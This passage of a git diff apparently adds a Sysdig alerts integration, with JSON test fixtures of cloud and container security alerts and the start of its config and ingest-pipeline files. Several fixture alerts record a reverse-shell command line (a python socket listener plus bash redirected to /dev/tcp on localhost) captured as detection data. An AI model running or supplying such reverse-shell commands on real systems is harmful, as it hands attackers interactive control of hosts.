"Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Describe Instances", + "ruleset": "Describe Instances - Sysdig AWS Activity Logs", + "version": "36" + }, + "sysdig": { + "category": "remote", + "containerId": "", + "content": { + "fields": { + "container.name": "" + }, + "output": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "policyOrigin": "Sysdig", + "policyVersion": 36, + "ruleName": "Describe Instances", + "ruleTags": [ + "MITRE_T1082_system_information_discovery", + "Cloud", + "AWS", + "AWS_EC2", + "MITRE", + "MITRE_TA0007_discovery", + "MITRE_T1580_cloud_infrastructure_discovery" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "event": { + "category": "remote", + "description": "A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)", + "type": "policy" + }, + "id": "17dec36048564c002c559dbdad20be41", + "labels": { + "cloudProvider": { + "account": { + "id": "414773805239" + }, + "name": "aws", + "region": "us-east-1" + } + }, + "machineId": "", + "name": "Describe Instances - Sysdig AWS Activity Logs", + "originator": "policy", + "severity": 7, + "source": "aws_cloudtrail", + "timestamp": 1720026926000000000, + "timestampRFC3339Nano": "2024-07-03T17:15:26Z", + "type": "policy" + }, + "tags": [ + "MITRE_T1082_system_information_discovery", + "Cloud", + "AWS", + "AWS_EC2", + "MITRE", + "MITRE_TA0007_discovery", + "MITRE_T1580_cloud_infrastructure_discovery" + ], + "threat.technique.id": [ + "T1082" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e051355585daf677e472ed2", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent= proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname= group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Privileged Shell Spawned Inside Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "81618044-80a5-44af-b27a-46acead3a4bc", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "bash -i", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/bash", + "proc.name": "bash", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140105", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent= proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname= group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Privileged Shell Spawned Inside Container", + "ruleTags": [ + "container", + "shell", + "SOC2", + "SOC2_CC6.1", + "PCI", + "PCI_DSS", + "PCI_DSS_10.1", + "PCI_DSS_10.2.1", + "NIST", + "NIST_800-171", + "NIST_800-171_3.1.1", + "NIST_800-171_3.1.2", + "NIST_800-171_3.14.6", + "NIST_800-171_3.3.1", + "NIST_800-171_3.3.2", + "NIST_800-53", + "NIST_800-53_AC-17", + "NIST_800-53_AU-6(8)", + "NIST_800-53_AU-2", + "NIST_800-53_AC-2(4)", + "FedRAMP", + "FedRAMP_AC-2(4)", + "FedRAMP_AU-2", + "ISO", + "ISO_27001", + "ISO_27001_A.9.4.4", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.310(b)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.i", + "HITRUST_CSF_01.j", + "HITRUST_CSF_01.n", + "HITRUST_CSF_01.p", + "HITRUST_CSF_01.s", + "HITRUST_CSF_01.y", + "HITRUST_CSF_06.i", + "HITRUST_CSF_09.aa", + "HITRUST_CSF_09.ab", + "HITRUST_CSF_09.ad", + "HITRUST_CSF_09.ae", + "HITRUST_CSF_09.m", + "HITRUST_CSF_09.s", + "GDPR", + "GDPR_32.1", + "GDPR_32.2", + "MITRE", + "MITRE_T1609_container_administration_command", + "MITRE_TA0002_execution", + "MITRE_TA0004_privilege_escalation", + "MITRE_T1068_exploitation_for_privilege_escalation", + "CIS" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e051355585daf677e472ed2", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187466069, + "timestampRFC3339Nano": "2024-07-03T18:23:17.187466069Z", + "type": "policy" + }, + "tags": [ + "container", + "shell", + "SOC2", + "SOC2_CC6.1", + "PCI", + "PCI_DSS", + "PCI_DSS_10.1", + "PCI_DSS_10.2.1", + "NIST", + "NIST_800-171", + "NIST_800-171_3.1.1", + "NIST_800-171_3.1.2", + "NIST_800-171_3.14.6", + "NIST_800-171_3.3.1", + "NIST_800-171_3.3.2", + "NIST_800-53", + "NIST_800-53_AC-17", + "NIST_800-53_AU-6(8)", + "NIST_800-53_AU-2", + "NIST_800-53_AC-2(4)", + "FedRAMP", + "FedRAMP_AC-2(4)", + "FedRAMP_AU-2", + "ISO", + "ISO_27001", + "ISO_27001_A.9.4.4", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.310(b)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.i", + "HITRUST_CSF_01.j", + "HITRUST_CSF_01.n", + "HITRUST_CSF_01.p", + "HITRUST_CSF_01.s", + "HITRUST_CSF_01.y", + "HITRUST_CSF_06.i", + "HITRUST_CSF_09.aa", + "HITRUST_CSF_09.ab", + "HITRUST_CSF_09.ad", + "HITRUST_CSF_09.ae", + "HITRUST_CSF_09.m", + "HITRUST_CSF_09.s", + "GDPR", + "GDPR_32.1", + "GDPR_32.2", + "MITRE", + "MITRE_T1609_container_administration_command", + "MITRE_TA0002_execution", + "MITRE_TA0004_privilege_escalation", + "MITRE_T1068_exploitation_for_privilege_escalation", + "CIS" + ], + "threat.technique.id": [ + "T1609" + ] + }, + { + "agent": { + "id": "58014837" + }, + "cloud": { + "account": { + "id": "289645096542" + }, + "availability_zone": "us-central1-c", + "instance": { + "id": "648229130641697246", + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "machine": { + "type": "e2-standard-4" + }, + "project": { + "id": "289645096542", + "name": "alliances-chronicle" + }, + "provider": "gcp", + "region": "us-central1" + }, + "container": { + "id": "6949e5f10829" + }, + "event": { + "id": "17dec7142e03c2766a36e7950883c5c4", + "kind": "alert", + "provider": "syscall", + "severity": 5 + }, + "host": { + "id": "42:01:0a:80:00:05", + "mac": [ + "42-01-0A-80-00-05" + ], + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "log": { + "syslog": { + "severity": { + "code": 5, + "name": "notice" + } + } + }, + "message": "Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "orchestrator": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": "default", + "resource": { + "name": "threatgen-c65cf6446-5s8kk", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "Sysdig" + ], + "category": "RULE_TYPE_FALCO", + "name": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleset": "Sysdig Runtime Notable Events", + "version": "90" + }, + "sysdig": { + "actions": [ + { + "afterEventNs": 30000000000, + "beforeEventNs": 15000000000, + "errMsg": "maximum number of outstanding captures (1) reached", + "successful": false, + "token": "35cf0ae3-a4ed-4c00-831f-f0b7c8489718", + "type": "" + } + ], + "agentId": 58014837, + "category": "runtime", + "containerId": "6949e5f10829", + "content": { + "fields": { + "container.name": "threatgen", + "proc.cmdline": "python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();", + "proc.cwd": "/tmp/", + "proc.exepath": "/usr/bin/python3.10", + "proc.name": "python3", + "proc.pcmdline": "bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1", + "proc.pid": "2140103", + "proc.pname": "bash", + "proc.ppid": "2140101", + "user.name": "root", + "user.uid": "0" + }, + "output": "Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent= container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552->127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' & sleep 1 && bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname= group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)", + "policyOrigin": "Sysdig", + "policyVersion": 90, + "ruleName": "Redirect STDOUT/STDIN to Network Connection in Container", + "ruleTags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "ruleType": "RULE_TYPE_FALCO" + }, + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "event": { + "category": "runtime", + "description": "This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.", + "type": "policy" + }, + "hostMac": "42:01:0a:80:00:05", + "id": "17dec7142e03c2766a36e7950883c5c4", + "labels": { + "cloudProvider": { + "account": { + "id": "289645096542" + }, + "name": "gcp", + "region": "us-central1" + }, + "gcp": { + "availabilityZone": "us-central1-c", + "instanceId": "648229130641697246", + "instanceName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o", + "machineType": "e2-standard-4", + "projectId": "289645096542", + "projectName": "alliances-chronicle" + }, + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o" + }, + "kubernetes": { + "cluster": { + "name": "gke-alliances-demo-6" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "threatgen-c65cf6446-5s8kk" + }, + "workload": { + "type": "deployment" + } + } + }, + "machineId": "42:01:0a:80:00:05", + "name": "Sysdig Runtime Notable Events", + "originator": "policy", + "severity": 5, + "source": "syscall", + "timestamp": 1720030997187379830, + "timestampRFC3339Nano": "2024-07-03T18:23:17.18737983Z", + "type": "policy" + }, + "tags": [ + "container", + "SOC2", + "SOC2_CC6.6", + "SOC2_CC6.7", + "NIST", + "NIST_800-53", + "NIST_800-53_AC-6(9)", + "NIST_800-53_AC-6(10)", + "NIST_800-53_AU-6(8)", + "HIPAA", + "HIPAA_164.308(a)", + "HIPAA_164.312(a)", + "HIPAA_164.312(b)", + "HITRUST", + "HITRUST_CSF", + "HITRUST_CSF_01.c", + "HITRUST_CSF_09.aa", + "MITRE", + "MITRE_TA0002_execution", + "MITRE_T1059_command_and_scripting_interpreter", + "MITRE_T1104_multi_stage_channels" + ], + "threat.technique.id": [ + "T1059" + ] + }, + { + "event": { + "id": "17e047935c2a5c6118242ab739a6ba5e", + "kind": "alert", + "provider": "auditTrail", + "severity": 0 + }, + "log": { + "syslog": { + "severity": { + "code": 0, + "name": "emergency" + } + } + }, + "message": "{\"id\":\"17e047935c2a5c6118242ab739a6ba5e\",\"type\":\"audittrail\",\"timestamp\":1720453755887574113,\"timestampRFC3339Nano\":\"2024-07-08T15:49:15.887574113Z\",\"originator\":\"ingestion\",\"category\":\"\",\"source\":\"auditTrail\",\"name\":\"\",\"description\":\"\",\"severity\":0,\"containerId\":\"\",\"machineId\":\"\"}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "category": "", + "containerId": "", + "description": "", + "event": { + "type": "audittrail" + }, + "id": "17e047935c2a5c6118242ab739a6ba5e", + "machineId": "", + "name": "", + "originator": "ingestion", + "severity": 0, + "source": "auditTrail", + "timestamp": 1720453755887574113, + "timestampRFC3339Nano": "2024-07-08T15:49:15.887574113Z", + "type": "audittrail" + } + }, + { + "event": { + "id": "17e047939adc188d8ee67f27d98a5929", + "kind": "alert", + "provider": "auditTrail", + "severity": 0 + }, + "log": { + "syslog": { + "severity": { + "code": 0, + "name": "emergency" + } + } + }, + "message": "{\"id\":\"17e047939adc188d8ee67f27d98a5929\",\"type\":\"audittrail\",\"timestamp\":1720453756939409549,\"timestampRFC3339Nano\":\"2024-07-08T15:49:16.939409549Z\",\"originator\":\"ingestion\",\"category\":\"\",\"source\":\"auditTrail\",\"name\":\"\",\"description\":\"\",\"severity\":0,\"containerId\":\"\",\"machineId\":\"\"}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "category": "", + "containerId": "", + "description": "", + "event": { + "type": "audittrail" + }, + "id": "17e047939adc188d8ee67f27d98a5929", + "machineId": "", + "name": "", + "originator": "ingestion", + "severity": 0, + "source": "auditTrail", + "timestamp": 1720453756939409549, + "timestampRFC3339Nano": "2024-07-08T15:49:16.939409549Z", + "type": "audittrail" + } + }, + { + "agent": { + "id": "57228830" + }, + "event": { + "id": "17e047be24848be2ae63efba47ac8869", + "kind": "alert" + }, + "host": { + "name": "gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk" + }, + "message": "{\"id\":\"17e047be24848be2ae63efba47ac8869\",\"agentId\":57228830,\"containerId\":\"\",\"type\":\"connection\",\"timestamp\":1720453939637554200,\"timestampRFC3339Nano\":\"2024-07-08T15:52:19.637554146Z\",\"labels\":{\"host.hostName\":\"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk\"}}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 57228830, + "containerId": "", + "event": { + "type": "connection" + }, + "id": "17e047be24848be2ae63efba47ac8869", + "labels": { + "host": { + "hostName": "gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk" + } + }, + "timestamp": 1720453939637554200, + "timestampRFC3339Nano": "2024-07-08T15:52:19.637554146Z", + "type": "connection" + } + }, + { + "agent": { + "id": "57841425" + }, + "event": { + "id": "17dec38d1ccc838ed8bd3c0690c2a92e", + "kind": "alert" + }, + "host": { + "name": "gke-gke-aliances-test-pa-default-pool-edcdf365-obof" + }, + "message": "{\"id\":\"17dec38d1ccc838ed8bd3c0690c2a92e\",\"agentId\":57841425,\"containerId\":\"\",\"type\":\"connection\",\"timestamp\":1720027118543078400,\"timestampRFC3339Nano\":\"2024-07-03T17:18:38.543078286Z\",\"labels\":{\"host.hostName\":\"gke-gke-aliances-test-pa-default-pool-edcdf365-obof\"}}", + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 57841425, + "containerId": "", + "event": { + "type": "connection" + }, + "id": "17dec38d1ccc838ed8bd3c0690c2a92e", + "labels": { + "host": { + "hostName": "gke-gke-aliances-test-pa-default-pool-edcdf365-obof" + } + }, + "timestamp": 1720027118543078400, + "timestampRFC3339Nano": "2024-07-03T17:18:38.543078286Z", + "type": "connection" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec30f432914be51fde04f0a93ff8f", + "kind": "alert" + }, + "host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": "{\"id\":\"17dec30f432914be51fde04f0a93ff8f\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"command\",\"timestamp\":1720026578020799700,\"timestampRFC3339Nano\":\"2024-07-03T17:09:38.020799678Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "command" + }, + "id": "17dec30f432914be51fde04f0a93ff8f", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026578020799700, + "timestampRFC3339Nano": "2024-07-03T17:09:38.020799678Z", + "type": "command" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec30ec6c62db90219722f069818ce", + "kind": "alert" + }, + "host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": "{\"id\":\"17dec30ec6c62db90219722f069818ce\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"command\",\"timestamp\":1720026575933943300,\"timestampRFC3339Nano\":\"2024-07-03T17:09:35.933943225Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "command" + }, + "id": "17dec30ec6c62db90219722f069818ce", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026575933943300, + "timestampRFC3339Nano": "2024-07-03T17:09:35.933943225Z", + "type": "command" + } + }, + { + "agent": { + "id": "58462617" + }, + "container": { + "id": "1eb848eba226" + }, + "event": { + "id": "17dec311bcc23cdab41a9d1b874f923f", + "kind": "alert" + }, + "host": { + "name": "aks-userpool-12996081-vmss000000" + }, + "message": "{\"id\":\"17dec311bcc23cdab41a9d1b874f923f\",\"agentId\":58462617,\"containerId\":\"1eb848eba226\",\"type\":\"fileaccess\",\"timestamp\":1720026588650814700,\"timestampRFC3339Nano\":\"2024-07-03T17:09:48.650814682Z\",\"labels\":{\"host.hostName\":\"aks-userpool-12996081-vmss000000\",\"kubernetes.cluster.name\":\"servicenow-test-cluster\",\"kubernetes.namespace.name\":\"default\",\"kubernetes.pod.name\":\"playground-86dfdc6cb5-42xgq\",\"kubernetes.workload.type\":\"deployment\"}}", + "orchestrator": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": "default", + "resource": { + "name": "playground-86dfdc6cb5-42xgq", + "parent": { + "type": "deployment" + } + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ] + }, + "sysdig": { + "agentId": 58462617, + "containerId": "1eb848eba226", + "event": { + "type": "fileaccess" + }, + "id": "17dec311bcc23cdab41a9d1b874f923f", + "labels": { + "host": { + "hostName": "aks-userpool-12996081-vmss000000" + }, + "kubernetes": { + "cluster": { + "name": "servicenow-test-cluster" + }, + "namespace": { + "name": "default" + }, + "pod": { + "name": "playground-86dfdc6cb5-42xgq" + }, + "workload": { + "type": "deployment" + } + } + }, + "timestamp": 1720026588650814700, + "timestampRFC3339Nano": "2024-07-03T17:09:48.650814682Z", + "type": "fileaccess" + } + }, + { + "agent": { + "id": "32212" + }, + "container": { + "id": "397be1762fba" + }, + "event": { + "id": "164806f4c47ad9101117d87f8b574ecf", + "kind": "alert" + }, + "host": { + "name": "qa-k8smetrics" + }, + "message": "{\"id\":\"164806f4c47ad9101117d87f8b574ecf\",\"agentId\":32212,\"containerId\":\"397be1762fba\",\"name\":\"nginx-76f9cf7469-k5kf7\",\"timestamp\":1606322948648718268,\"timestampRFC3339Nano\":\"2020-11-25T16:49:08.648718268Z\",\"type\":\"kubernetes\",\"labels\":{\"host.hostName\":\"qa-k8smetrics\",\"kubernetes.cluster.name\":\"demo-env-prom\",\"kubernetes.namespace.name\":\"nginx\",\"kubernetes.pod.name\":\"nginx-76f9cf7469-k5kf7\"}}", + "orchestrator": { + "cluster": { + "name": "demo-env-prom" + }, + "namespace": "nginx", + "resource": { + "name": "nginx-76f9cf7469-k5kf7" + }, + "type": "kubernetes" + }, + "rule": { + "author": [ + "" + ], + "ruleset": "nginx-76f9cf7469-k5kf7" + }, + "sysdig": { + "agentId": 32212, + "containerId": "397be1762fba", + "event": { + "type": "kubernetes" + }, + "id": "164806f4c47ad9101117d87f8b574ecf", + "labels": { + "host": { + "hostName": "qa-k8smetrics" + }, + "kubernetes": { + "cluster": { + "name": "demo-env-prom" + }, + "namespace": { + "name": "nginx" + }, + "pod": { + "name": "nginx-76f9cf7469-k5kf7" + } + } + }, + "name": "nginx-76f9cf7469-k5kf7", + "timestamp": 1606322948648718268, + "timestampRFC3339Nano": "2020-11-25T16:49:08.648718268Z", + "type": "kubernetes" + } + } + ] +} \ No newline at end of file diff --git a/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml b/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..850d99a2caf --- /dev/null +++ b/packages/sysdig/data_stream/alerts/_dev/test/system/test-default-config.yml @@ -0,0 +1,12 @@ +service: sysdig-alerts-http +service_notify_signal: SIGHUP +input: http_endpoint +vars: ~ +data_stream: + vars: + listen_port: 9035 + listen_address: 0.0.0.0 + preserve_original_event: true +wait_for_data_timeout: 180s +assert: + hit_count: 15 diff --git a/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs b/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs new file mode 100644 index 00000000000..dad2fb22c35 --- /dev/null +++ b/packages/sysdig/data_stream/alerts/agent/stream/http.yml.hbs @@ -0,0 +1,32 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if enable_request_tracer}} +tracer.filename: "../../logs/http_endpoint/http-request-trace-*.ndjson" +tracer.maxbackups: 5 +{{/if}} +tags: +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +processors: + - add_locale: ~ +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} \ No newline at end of file diff --git a/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..0c93b5a9d6e --- /dev/null +++ b/packages/sysdig/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,293 @@ +--- +description: Pipeline for mapping Sysdig fields to ECS / sysdig-namespaced fields +processors: +- set: + field: event.kind + value: 'alert' +- json: + field: message + target_field: json + if: ctx.message != null +- rename: + 